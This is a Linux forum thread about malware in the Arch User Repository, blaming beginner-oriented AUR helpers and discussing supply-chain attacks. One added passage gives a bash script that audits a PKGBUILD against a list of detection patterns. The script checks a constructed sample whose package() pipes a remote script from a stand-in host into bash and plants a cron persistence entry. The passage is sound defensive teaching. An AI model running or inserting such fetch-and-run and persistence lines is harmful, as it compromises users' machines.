this post was submitted on 14 Jun 2026
129 points (98.5% liked)

Linux

bitfucker@programming.dev 38 points 1 week ago

Honestly I take no issue with the malware attack. I find it more offensive that many publications write it like it's the end of Arch. Like bro, the AUR is NOT what I'd recommend to beginners to get their packages from. Some of the obscure packages include browser extensions. Like, why would you install an extension from the AUR instead of the browser extension marketplace? This is why easy and braindead AUR helpers need to die. They encourage bad practice.
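The "bad practice" the comment above refers to is building an AUR package without ever reading its PKGBUILD. The script below is an added example, not code from this thread or from any AUR helper: a small pre-build check that greps a PKGBUILD for the things a human reviewer looks for (a download piped into a shell, unpinned checksums, network fetches inside build functions, writes outside `$pkgdir`). The PKGBUILD it audits is constructed for illustration, the package name and URLs in it are made up, and the patterns are heuristics, not a malware signature.

```shell
#!/usr/bin/env bash
# Added example, not code from the thread or from any AUR helper: a minimal
# "read the PKGBUILD before you build it" check, the step a blindly-confirming
# helper lets users skip. Patterns are reviewer heuristics, not a signature.

set -u

# Print one finding per suspicious line, then a "FINDINGS: <n>" summary line.
# Returns 1 if anything was flagged (so it can gate makepkg), 0 otherwise.
audit_pkgbuild() {
  local file="$1" hits=0 line
  while IFS= read -r line; do
    case "$line" in
      *'| sh'*|*'| bash'*|*'|sh'*|*'|bash'*)          # download piped into a shell
        printf 'PIPE_TO_SHELL      %s\n' "$line"; hits=$((hits + 1)) ;;
      *'base64 -d'*|*'base64 --decode'*|*'eval '*)   # decoded or eval'd payload
        printf 'OBFUSCATION        %s\n' "$line"; hits=$((hits + 1)) ;;
      *'curl '*|*'wget '*)                           # fetch outside the source=() array
        printf 'FETCH_IN_BUILD     %s\n' "$line"; hits=$((hits + 1)) ;;
      *'$HOME'*|*'~/.'*|*'/etc/'*|*'systemctl '*)    # touching the user's home or the system
        printf 'OUTSIDE_PKGDIR     %s\n' "$line"; hits=$((hits + 1)) ;;
      *sums=*"'SKIP'"*)                              # source integrity not pinned
        printf 'UNPINNED_CHECKSUM  %s\n' "$line"; hits=$((hits + 1)) ;;
    esac
  done < "$file"
  printf 'FINDINGS: %d\n' "$hits"
  [ "$hits" -eq 0 ]
}

# Constructed PKGBUILD for the example (package name and URLs are made up):
# a "browser extension" package whose package() does far more than install files.
PKGBUILD_FILE=$(mktemp "${TMPDIR:-/tmp}/PKGBUILD.XXXXXX")
cat > "$PKGBUILD_FILE" <<'EOF'
pkgname=example-browser-ext
pkgver=1.0
pkgrel=1
arch=('any')
source=("https://github.com/example/ext/archive/v$pkgver.tar.gz")
sha256sums=('SKIP')

package() {
  cd "$srcdir/ext-$pkgver"
  install -Dm644 manifest.json "$pkgdir/usr/share/example/manifest.json"
  curl -fsSL https://example.invalid/helper.sh | bash
  echo "@reboot $HOME/.cache/.x" >> "$HOME/.crontab"
}
EOF

# Gate the build on the audit instead of answering "y" to a helper's prompt.
if audit_pkgbuild "$PKGBUILD_FILE"; then
  echo "clean: go ahead and run makepkg"
else
  echo "REJECT: read the flagged lines in $PKGBUILD_FILE before building"
fi
```

In practice you would point `audit_pkgbuild` at the clone directory a helper leaves behind (or at the output of `git clone https://aur.archlinux.org/<pkg>.git`) and treat any non-zero exit as "stop and read", not as a verdict; a clean run means only that none of these particular patterns appeared.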

porkloin@lemmy.world 12 points 6 days ago (last edited 6 days ago)

CachyOS, which is one of the fastest growing distros and gets haphazardly recommended to tons of gaming refugees, ships with paru by default. Millions of forums, search results and LLM outputs encourage those same users to install stuff from AUR.

Any Arch distro that has a sizeable non-technical user base should know better than to ship or encourage using the AUR. Shit like this is how we kill the "Year of the Linux desktop".

devfuuu@lemmy.world 6 points 6 days ago

This is exactly how we make the year of Linux happen. For an alternative OS to enter the mainstream it needs to be at the level of Windows, so it should have lots of malware around.

bitfucker@programming.dev 3 points 6 days ago (last edited 6 days ago)

The problem is the delivery mechanism. Malware is quite rare on Linux because we trust the maintainers. Unlike on Windows, where you're normalized to downloading executables off the internet.

Edit: What I meant is, notice that almost all of the attacks on Linux are supply-chain based and not direct malware downloads. Be it via typosquatting, package manager repository hijacking, or even a long game like xz.